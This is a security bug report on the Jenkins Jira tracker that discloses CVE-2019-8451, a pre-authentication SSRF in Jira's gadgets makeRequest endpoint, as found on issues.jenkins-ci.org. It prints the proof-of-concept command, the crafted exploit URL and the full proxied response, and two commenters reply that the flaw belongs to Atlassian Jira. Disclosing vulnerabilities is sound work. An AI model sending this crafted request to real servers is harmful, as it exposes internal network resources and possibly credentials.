Uploaded image for project: 'Jenkins'
  1. Jenkins
  2. JENKINS-59916

SSRF on https://issues.jenkins-ci.org/

    Details

    • Similar Issues:

      Description

      Hi Security Team,

      Summary

      The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.

      CVE-2019-8451 is a pre-authentication server side request forgery (SSRF) vulnerability found in the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal network resources.

      The vulnerability was first introduced in Jira Core and Jira Software versions 7.6.0, an enterprise release in November 2017, and affects Jira Core and Software versions from 7.6.0 through 8.3.4.

      Steps To Reproduce:

      1. Target is https://issues.jenkins-ci.org/ use Atlassian Jira Project Management Software (v7.13.6)
      2. Lets rock!

      wayc0de@DESKTOP-9C0TVKV:~/tools/CVE-2019-8451$ python CVE-2019-8451.py https://issues.jenkins-ci.org

      Result :

      >>>>SSRF URL: www.baidu.com

      >>>>Send poc Success!

      X-AUSERNAME= anonymous

      >>>>vuln_url= https://issues.jenkins-ci.org/plugins/servlet/gadgets/makeRequest?url=https://issues.jenkins-ci.org@www.baidu.com

      throw 1; < don't be evil' >{"https://issues.jenkins-ci.org@www.baidu.com":{"rc":200,"headers":

      {"set-cookie":["BDORZ=27315; max-age=86400; domain=.baidu.com; path=/"]}

      ,"body":"<!DOCTYPE html>\r\n<!-STATUS OK-><html> <head><meta http-equiv=content-type content=text/html;charset=utf-8><meta http-equiv=X-UA-Compatible content=IE=Edge><meta content=always name=referrer><link rel=stylesheet type=text/css href=https://ss1.bdstatic.com/5eN1bjq8AAUYm2zgoY3K/r/www/cache/bdorz/baidu.min.css><title>百度一下,你就知道<\/title><\/head> <body link=#0000cc> <div id=wrapper> <div id=head> <div class=head_wrapper> <div class=s_form> <div class=s_form_wrapper> <div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> <\/div> <form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class=\"bg s_ipt_wr\"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus=autofocus><\/span><span class=\"bg s_btn_wr\"><input type=submit id=su value=百度一下 class=\"bg s_btn\" autofocus><\/span> <\/form> <\/div> <\/div> <div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>新闻<\/a> <a href=https://www.hao123.com name=tj_trhao123 class=mnav>hao123<\/a> <a href=http://map.baidu.com name=tj_trmap class=mnav>地图<\/a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>视频<\/a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>贴吧<\/a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&amp;tpl=mn&amp;u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>登 录<\/a> <\/noscript> <script>document.write('<a href=\"http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === \"\" ? \"?\" : \"&\")+ \"bdorz_come=1\")+ '\" name=\"tj_login\" class=\"lb\">登录<\/a>');\r\n <\/script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style=\"display: block;\">更多产品<\/a> <\/div> <\/div> <\/div> <div id=ftCon> <div id=ftConw> <p id=lh> <a href=http://home.baidu.com>关于百度<\/a> <a href=http://ir.baidu.com>About Baidu<\/a> <\/p> <p id=cp>©2017 Baidu <a href=http://www.baidu.com/duty/>使用百度前必读<\/a>  <a href=http://jianyi.baidu.com/ class=cp-feedback>意见反馈<\/a> 京ICP证030173号  <img src=//www.baidu.com/img/gs.gif> <\/p> <\/div> <\/div> <\/div> <\/body> <\/html>\r\n"}}

      As you can on respond <title>百度一下 ,你就知道<\/title>

      Reference
      1. https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
      2. https://jira.atlassian.com/browse/JRASERVER-69793

      Impact :

      An SSRF can provide attackers with the ability to query the cloud provider’s APIs, enumerating permissions and extracting data or executing API commands for other cloud services. Our example above simply aims to get the security credentials from the environment

        Attachments

          Activity

          Hide
          warden Radek Antoniuk added a comment -

          This is caused by a security vulnerability in Atlassian JIRA, not Jenkins Jira plugin that is only a consumer of Jira API, correct?
          This issue tracker for issues in Jenkins and/or Jenkins plugins only.

          Show
          warden Radek Antoniuk added a comment - This is caused by a security vulnerability in Atlassian JIRA, not Jenkins Jira plugin that is only a consumer of Jira API, correct? This issue tracker for issues in Jenkins and/or Jenkins plugins only.
          Hide
          aiguom Marton Bin added a comment -

          Where is the feedback of such questions?

          Show
          aiguom Marton Bin added a comment - Where is the feedback of such questions?

            People

            • Assignee:
              Unassigned
              Reporter:
              wayc0de Wayc0de
            • Votes:
              1 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated: